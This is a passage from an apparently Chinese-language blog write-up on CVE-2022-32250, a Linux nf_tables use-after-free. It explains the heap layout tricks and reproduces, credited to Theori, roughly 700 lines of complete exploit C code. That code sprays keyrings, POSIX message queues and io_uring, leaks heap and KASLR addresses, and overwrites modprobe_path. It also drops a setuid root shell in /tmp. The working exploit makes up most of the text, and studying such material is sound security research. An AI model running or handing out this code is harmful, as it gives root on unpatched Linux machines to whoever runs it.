if (list_empty(&leaf->msg_list)) {
msg_tree_erase(leaf, info);
}
}
info->attr.mq_curmsgs--;
info->qsize -= msg->m_ts;
return msg;
}

随后通过store_msg将消息发送到用户态,最后再free掉对应的msg结构体。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;

security_msg_msg_free(msg);

seg = msg->next;
kfree(msg);
while (seg != NULL) {
struct msg_msgseg *tmp = seg->next;

cond_resched();
kfree(seg);
seg = tmp;
}
}

在释放函数中可以看到在开头位置会释放掉security但是这个是不可控的,如果不为0大概率会造成kernel panic所以要确保为0。并且可以看到这里并没有像以前那样可以用MSG_COPY来解决,并且在copy_to_user函数中会检测读取内容是否超过了堆块大小所以最多读取0x10的内容,所以只能寻求新的方法。

1
2
3
4
5
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

值得注意的是前面提到的user_key_payload结构体的前面0x10个字节其实是如上结构体,他的前八个字节默认为0,并且func是指向user_free_payload_rcu函数的,所以保证了security为0并且可以成功泄漏出内核地址。

所以这里需要确保user_free_payload_rcu结构体紧贴posix_msg_tree_node结构体的next指针指向的位置,所以可以先用io_uring占位,在申请第二个expr之前释放掉,这是大概率就会挤在一起了,这时在进行堆喷user_free_payload_rcu即可实现。

提权

至此来看约束条件还是比较多的,并不能实现传统意义上的任意地址写,不过在以往的一篇文章中介绍过modprobe_path这一个内核全局变量。

侵删

这一步的构造方式和上述其实类似,也是通过堆喷posix_msg_tree_node结构体再通过UAF使其指向一个object,不过最后其指向的object是会被free掉的,那么紧接着堆喷usr_key_payload结构体,那么此时一个msg_msg结构体被两个usr_key_payload结构体所裹挟了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}

static inline void __list_del_entry(struct list_head *entry)
{
if (!__list_del_entry_valid(entry))
return;

__list_del(entry->prev, entry->next);
}

static inline void list_del(struct list_head *entry)
{
__list_del_entry(entry);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}

在读取消息时会调用msg_get函数获取到msg_msg结构体,并且在获取的时候紧跟着的就是list_del从链表中删除掉,可以看到其中出现了对指针的指针赋值的操作,这个操作其实在用户态堆中的unlink的时候就已经接触过了,所以如果我们可以控制prevnext那么就可以实现不任意地址写不任意值了,具体要求肯定就是保证两个指针都是可写的。那么这里可以使用0xffff????2f706d74进行写modprobe_path位置,最终的效果就为/tmp/????xffxffprobe,这的????是前面泄漏出来的堆地址。

exp

这里exp就直接用他的了( 因为我也不熟悉该模块所以就算自己写也会和他的大差不差 )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
// gcc exp.c -o exp -l mnl -l nftnl -w
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <sched.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <err.h>
#include <libmnl/libmnl.h>
#include <libnftnl/chain.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <libnftnl/table.h>
#include <libnftnl/set.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <sched.h>
#include <sys/types.h>
#include <signal.h>
#include <net/if.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <sys/socket.h>
#include <linux/ethtool.h>
#include <linux/sockios.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <syscall.h>
#include <mqueue.h>
#include <linux/io_uring.h>
#include <linux/keyctl.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/mman.h>

#define MQUEUE_NUM 5


#define INBOUND 0
#define OUTBOUND 1
#define DESC_MAX 0x800

#define BUFFER 0x100
#define NAMELEN 0x100
#define ERROR_PREFIX "err: "

#define KEY_DESC_MAX_SIZE 40

#define PREFIX_BUF_LEN 16
#define RCU_HEAD_LEN 16

#define SPRAY_KEY_SIZE 50

#define PHYSMAP_MASK 0xffffffff00000000

#define SPRAY_SIZE 1000

#define SPRAY_NB_ENTRIES 10

uint64_t base_base;
uint64_t heap_base;
uint64_t modprobe_addr;

enum nft_trans_phase {
NFT_TRANS_PREPARE,
NFT_TRANS_ABORT,
NFT_TRANS_COMMIT,
NFT_TRANS_RELEASE
};

typedef struct
{
long mtype;
char mtext[1];
}msg;

typedef struct
{
void *ll_next;
void *ll_prev;
long m_type;
size_t m_ts;
void *next;
void *security;
}msg_header;

typedef struct
{
char name[BUFFER];
} Msg;

typedef struct
{
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
char desc[DESC_MAX];
} user_rule_t;


struct keyring_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
unsigned short len;
};

struct leak {
long kaslr_base;
long physmap_base;
};

struct fd_uring {
int fd;
struct io_uring_params *params;
};

typedef int32_t key_serial_t;

const char priv_file[] = "/tmp/shell.c\0";
const char dummy_file[] = "/tmp/dummy\0";

const char priv_context[] = "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main(int argc, char **argv){if (geteuid() == 0){setuid(0);setgid(0);puts(\"[+] I am root\");system(\"bash\");}}\x00";
const char dummy_content[] = "\xff\xff\xff\xff";
const char new_modprobe_content[] = "#!/bin/bash\n\nchown root:root /tmp/shell\nchmod 4555 /tmp/shell\n";



static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

void bye(char *info)
{
puts(info);
exit(-2);
}

void do_error_exit(char *info)
{
puts(info);
exit(-1);
}

void bye2(char *info, char *arg)
{
printf(info, arg);
}

key_serial_t *spray_keyring(uint32_t start, uint32_t spray_size) {

char key_desc[KEY_DESC_MAX_SIZE];
key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

if (id_buffer == NULL)
bye("calloc");

for (uint32_t i = start; i < start+spray_size; i++) {
snprintf(key_desc, KEY_DESC_MAX_SIZE, "SPRAY-RING-%03du", i);
id_buffer[i] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING);
if (id_buffer[i] < 0)
bye("add_key");
}

return id_buffer;
}

key_serial_t *spray_keyring_list_del_purpose(uint32_t spray_size, uint64_t next, uint64_t prev, uint64_t size)
{
// next[0x8] = prev, prev[0x0] = next allocation occured at gather mqueue
char key_desc[KEY_DESC_MAX_SIZE];
key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

char temp[0x20];
memcpy(temp+0x0, &next, 8);
memcpy(temp+0x8, &prev, 8);
memcpy(temp+0x10, "12341234", 8);
memcpy(temp+0x18, &size, 8);

if (id_buffer == NULL)
do_error_exit("calloc");

for (uint32_t i = 0; i < spray_size; i++) {
id_buffer[i] = add_key("user", temp, temp, 0x20, KEY_SPEC_PROCESS_KEYRING);
if (id_buffer[i] < 0)
do_error_exit("add_key");
}

return id_buffer;
}

key_serial_t *spray_keyring_list_overwrite_purpose(uint32_t spray_size, uint64_t len, uint64_t off_18,
uint64_t off_20, uint64_t off_28, uint64_t off_30, uint64_t off_38)
{
char key_desc[KEY_DESC_MAX_SIZE];
key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

char temp[0x40];
switch((len-1)/8)
{
case 0:
memcpy(temp+0x0, &off_18, 8);
case 1:
memcpy(temp+0x8, &off_20, 8);
case 2:
memcpy(temp+0x10, &off_28, 8);
case 3:
memcpy(temp+0x18, &off_30, 8);
case 4:
memcpy(temp+0x20, &off_38, 8);
break;
default:
bye("add_key - assert(len <= 0x28)");
}

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, KEY_DESC_MAX_SIZE, temp);
id_buffer[i] = add_key("user", temp, temp, len, KEY_SPEC_PROCESS_KEYRING);
if (id_buffer[i] < 0)
do_error_exit("add_key");
}

return id_buffer;
}

int get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size) {

uint8_t buffer[USHRT_MAX] = {0};
int32_t keylen;

for (uint32_t i = 0; i < id_buffer_size; i++) {

keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, 0x10, 0);
if (keylen < 0)
bye("keyctl");

if(!strncmp(&buffer[6],"\xff\xff", 2))
{
heap_base = *((uint64_t*)buffer);
printf("[+] leak successed, kmalloc-64 heap: 0x%llx\n", heap_base);
return i;
}
else
printf("[-] leak failed, idkval: %s\n", buffer);
}
return id_buffer_size;
}

void awake_partial_keys(key_serial_t *id_buffer, uint32_t idx) {
uint8_t buffer[USHRT_MAX] = {0};
int32_t keylen;
keylen = keyctl(KEYCTL_UPDATE, id_buffer[idx], (long)buffer, 0x10, 0);
}



void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size)
{

for (uint32_t i = 0; i < id_buffer_size; i++) {
if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
do_error_exit("keyctl(KEYCTL_REVOKE)");
}

free(id_buffer);
}

void release_partial_keys(key_serial_t *id_buffer, int i)
{
if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
do_error_exit("keyctl(KEYCTL_REVOKE)");
}


void unshare_setup(uid_t uid, gid_t gid)
{
int temp;
char edit[0x100];

unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET);

temp = open("/proc/self/setgroups", O_WRONLY);
write(temp, "deny", strlen("deny"));
close(temp);

temp = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", uid);
write(temp, edit, strlen(edit));
close(temp);

temp = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", gid);
write(temp, edit, strlen(edit));
close(temp);

return;
}


void set_stable_table_and_set(struct mnl_socket* nl, const char *name)
{
char * table_name = name;
char * set_name = NULL;
uint8_t family = NFPROTO_IPV4;
uint32_t set_id = 1;

// a table for the sets to be associated with
struct nftnl_table * table = nftnl_table_alloc();
nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

struct nftnl_set * set_stable = nftnl_set_alloc();
set_name = "set_stable";
nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);
nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, 1);
nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);
nftnl_set_set_u32(set_stable, NFTNL_SET_ID, set_id++);

// expressions
struct nftnl_expr * exprs[128];
int exprid = 0;

// serialize
char buf[MNL_SOCKET_BUFFER_SIZE*2];

struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr * nlh;
int table_seq = seq;

nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWTABLE, family, NLM_F_CREATE|NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, table);
mnl_nlmsg_batch_next(batch);

// add set_stable
nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWSET, family,
NLM_F_CREATE|NLM_F_ACK, seq++);
nftnl_set_nlmsg_build_payload(nlh, set_stable);
nftnl_set_free(set_stable);
mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL) {
err(1, "mnl_socket_open");
}

printf("[+] setting stable %s and set\n", table_name);
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0) {
err(1, "mnl_socket_send");
}
}

void set_trigger_set_and_overwrite(struct mnl_socket* nl, const char *name, const char *set_name)
{
char * table_name = name;
uint8_t family = NFPROTO_IPV4;
uint32_t set_id = 1;
struct nftnl_expr * exprs[128];
int exprid = 0;
struct nlmsghdr * nlh;

struct nftnl_set * set_trigger = nftnl_set_alloc();

nftnl_set_set_str(set_trigger, NFTNL_SET_TABLE, table_name);
nftnl_set_set_str(set_trigger, NFTNL_SET_NAME, set_name);
nftnl_set_set_u32(set_trigger, NFTNL_SET_FLAGS, NFT_SET_EXPR);
nftnl_set_set_u32(set_trigger, NFTNL_SET_KEY_LEN, 1);
nftnl_set_set_u32(set_trigger, NFTNL_SET_FAMILY, family);
nftnl_set_set_u32(set_trigger, NFTNL_SET_ID, set_id);
exprs[exprid] = nftnl_expr_alloc("lookup");
nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");
nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);
nftnl_set_add_expr(set_trigger, exprs[exprid]);
exprid++;

char buf[MNL_SOCKET_BUFFER_SIZE*2];

struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWSET, family,
NLM_F_CREATE|NLM_F_ACK, seq++);
nftnl_set_nlmsg_build_payload(nlh, set_trigger);
nftnl_set_free(set_trigger);
mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL) {
err(1, "mnl_socket_open");
}

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0) {
err(1, "mnl_socket_send");
}

printf("[+] triggering UAF set and overwrite *(prevchunk+0x18)\n");
}

void set_cpu_affinity(int cpu_n, pid_t pid) {
cpu_set_t set;

CPU_ZERO(&set);
CPU_SET(cpu_n, &set);

if (sched_setaffinity(pid, sizeof(set), &set) < 0)
do_error_exit("sched_setaffinity");
}

void spray_mqueue(mqd_t mqdes, char *msgptr, int spray_size)
{
char msgrv[BUFFER];
unsigned rvprio, sdprio = 1;
struct timespec ts;
int unresolved = 0;

int priority = 0;

printf("[*] spraying mqueue...\n");
for(int i=0; i<spray_size; i++)
if (mq_send(mqdes, msgptr, 0x28, sdprio) != 0)
perror(ERROR_PREFIX "mq_send");
}

int gather_mqueue(mqd_t mqdes, int gather_size)
{
int priority = 0;
char msg[BUFFER];
printf("[*] gathering mqueue...\n");
for(int i=0; i<gather_size; i++)
{
if (mq_receive(mqdes, (char*) &msg, BUFFER, NULL) != -1)
{

if(*((uint64_t *)msg) & 0xffffffff00000000 != 0xffffffff00000000)
bye("[-] can't leak base... \n");

base_base = *((uint64_t *)msg) - 0x51af80;
modprobe_addr = base_base + 0x1e8b320;
printf("[+] KASLR base: 0x%llx\n", base_base);
printf("[+] modprobe addr: 0x%llx\n", modprobe_addr);
}
}
return 0;
}

int gather_mqueue_nosave(mqd_t mqdes, int gather_size)
{
int priority = 0;
char msg[BUFFER];
printf("[*] gathering mqueue...\n");
for(int i=0; i<gather_size; i++)
mq_receive(mqdes, (char*) &msg, BUFFER, NULL);

return 0;
}

void spray_msg_msg(unsigned int size, unsigned int amount, int qid)
{
char buffer[0x2000];
msg *spray = (msg *)buffer;

// assert(size >= 0x31 && size <= 0x1000 - 0x8);
printf("[*] try to spray msg_msg\n");
spray->mtype = 1;

memset(spray->mtext, 0x41, size - 0x30);

for (int i = 0; i < amount; i++)
{
if(i % 0x10 == 0)
printf("[*] spraying msg_msg: 0x%x\n", i);
if (msgsnd(qid, spray, size - 0x30, 0) == -1)
{
perror("msgsend failure");
exit(-1);
}
}
return;
}

static inline int io_uring_setup(uint32_t entries, struct io_uring_params *p) {
return syscall(__NR_io_uring_setup, entries, p);
}

static inline int io_uring_register(int fd, unsigned int opcode, void *arg, unsigned int nr_args) {
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}


struct fd_uring *spray_uring(uint32_t spray_size, struct fd_uring *fd_buffer) {

for (uint64_t i = 0; i < spray_size; i++) {

fd_buffer[i].params = malloc(sizeof(struct io_uring_params));
if (!fd_buffer[i].params)
do_error_exit("malloc");
memset(fd_buffer[i].params, 0, sizeof(struct io_uring_params));

fd_buffer[i].fd = io_uring_setup(SPRAY_NB_ENTRIES, fd_buffer[i].params);
if (fd_buffer[i].fd < 0)
do_error_exit("io_uring_create");

}
return fd_buffer;
}

void release_uring(struct fd_uring *fd_buffer, uint32_t buffer_size) {

for (uint32_t i = 0; i < buffer_size; i++) {
close(fd_buffer[i].fd);
}
free(fd_buffer);
}

void release_partial_uring(struct fd_uring *fd_buffer, uint32_t buffer_idx) {

close(fd_buffer[buffer_idx].fd);
}

void prepare_root_shell(void) {
create_dummy_file();
create_priv_file();
}

void create_dummy_file(void) {
int fd;

fd = open(dummy_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
write(fd, dummy_content, sizeof(dummy_content));
close(fd);
}

void create_priv_file(void) {
int fd;

fd = open(priv_file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
write(fd, priv_context, sizeof(priv_context));
close(fd);

system("gcc -o /tmp/shell /tmp/shell.c -w");
}

void write_new_modprobe() {

int fd, fd_modprobe;
char modprobe_name[0x10] = {0, };

fd_modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(fd_modprobe, modprobe_name, 14);
close(fd_modprobe);

printf("[*] current modprobe name: %s\n", modprobe_name);
fd = open(modprobe_name, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO);
if (fd < 0)
do_error_exit("open");

write(fd, new_modprobe_content, sizeof(new_modprobe_content));

close(fd);
}

void setup_modprobe_payload() {
write_new_modprobe();
}

void userland_T(int *sema)
{
while(*sema);
}

void sema_up(int *sema)
{
*sema = 1;
}

void sema_down(int *sema)
{
*sema = 0;
}

int main(int argc, char ** argv)
{
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
char c;
char writebuf[0x2000];

char mqname[MQUEUE_NUM][NAMELEN] = {"/qname1", "/qname2", "/qname3", "/qname4", "/qname5"};
mqd_t mqid[MQUEUE_NUM];
struct mq_attr attr;
attr.mq_flags = 0;
attr.mq_maxmsg = 10;
attr.mq_msgsize = BUFFER;
attr.mq_curmsgs = 0;
int uaf_id = 0;

int *sema = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
int *sema2 = malloc(0x10);

prepare_root_shell();
sema_up(sema);
if(fork())
{
set_cpu_affinity(1, getpid());
userland_T(sema);
sleep(1);
printf("\n\n[------------------------- stage 4: Execute Malicious File -------------------------------]\n");
setup_modprobe_payload();
execve("/tmp/dummy", NULL, NULL);
execve("/tmp/shell", NULL, NULL);
}

unshare_setup(getuid(), getgid());

set_cpu_affinity(0, 0);

struct fd_uring *fd_buffer = calloc(SPRAY_SIZE, sizeof(struct fd_uring));
if (!fd_buffer)
do_error_exit("calloc");

for(int i=0; i<5; i++)
if((mqid[i] = mq_open(mqname[i], O_CREAT | O_RDWR, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH, &attr)) < 0)
bye("MQUEUE");

struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);

printf("\n\n[------------------------- stage 0: Allocate stable table and set ------------------------]\n");
set_stable_table_and_set(nl, "table1");
set_stable_table_and_set(nl, "table2");
set_stable_table_and_set(nl, "table3");
set_stable_table_and_set(nl, "table4");

printf("\n\n[------------------------- stage 1: Leak heap address ------------------------------------]\n");
set_trigger_set_and_overwrite(nl, "table1", "set_trigger0");

key_serial_t *id_buffer = spray_keyring(0, SPRAY_KEY_SIZE);

set_trigger_set_and_overwrite(nl, "table1", "set_trigger1");
if((uaf_id = get_keyring_leak(id_buffer, SPRAY_KEY_SIZE)) == SPRAY_KEY_SIZE)
bye("[-] leak failed...");

printf("\n\n[------------------------- stage 2: Leak KASLR address -----------------------------------]\n");

spray_uring(SPRAY_SIZE, fd_buffer);

set_trigger_set_and_overwrite(nl, "table2", "set_trigger2");
spray_mqueue(mqid[0], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4);

release_partial_uring(fd_buffer, SPRAY_SIZE-1);
for(int i = 3; i > 113; i++)
release_partial_uring(fd_buffer, SPRAY_SIZE-i);
release_partial_uring(fd_buffer, SPRAY_SIZE-2);
set_trigger_set_and_overwrite(nl, "table2", "set_trigger3");
key_serial_t *id_buffer3 = spray_keyring_list_del_purpose(SPRAY_KEY_SIZE*2, heap_base, heap_base, 0x28);// keyring <-> msg_msg overlap
gather_mqueue(mqid[0], 1);

sleep(1);
printf("\n\n[------------------------- stage 3: Overwrite modprobe_path ------------------------------]\n");

set_trigger_set_and_overwrite(nl, "table3", "set_trigger4");
spray_mqueue(mqid[1], "TESTMSGTESTMSGTESTMSGTESTMSGTESTMSG", 4);
set_trigger_set_and_overwrite(nl, "table3", "set_trigger5");
id_buffer = spray_keyring_list_del_purpose(1, modprobe_addr-0x8+0x1, (heap_base&0xffffffff00000000)+0x2f706d74, 0x10);
sema_down(sema);
gather_mqueue_nosave(mqid[1], 1);

sleep(1);
for(int i=SPRAY_SIZE/2+12; i<SPRAY_SIZE; i++)
release_partial_uring(fd_buffer, i);

while(1);
}

这里也用了io_uring,不过我看其申请的参数其实是GFP_KERNEL_ACCOUNT,不明白为什么这里又可以进行占位了( 有种自相矛盾的感觉 )。


参考链接:

https://blog.theori.io/linux-kernel-exploit-cve-2022-32250-with-mqueue-a8468f32aab5

https://github.com/theori-io/CVE-2022-32250-exploit

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量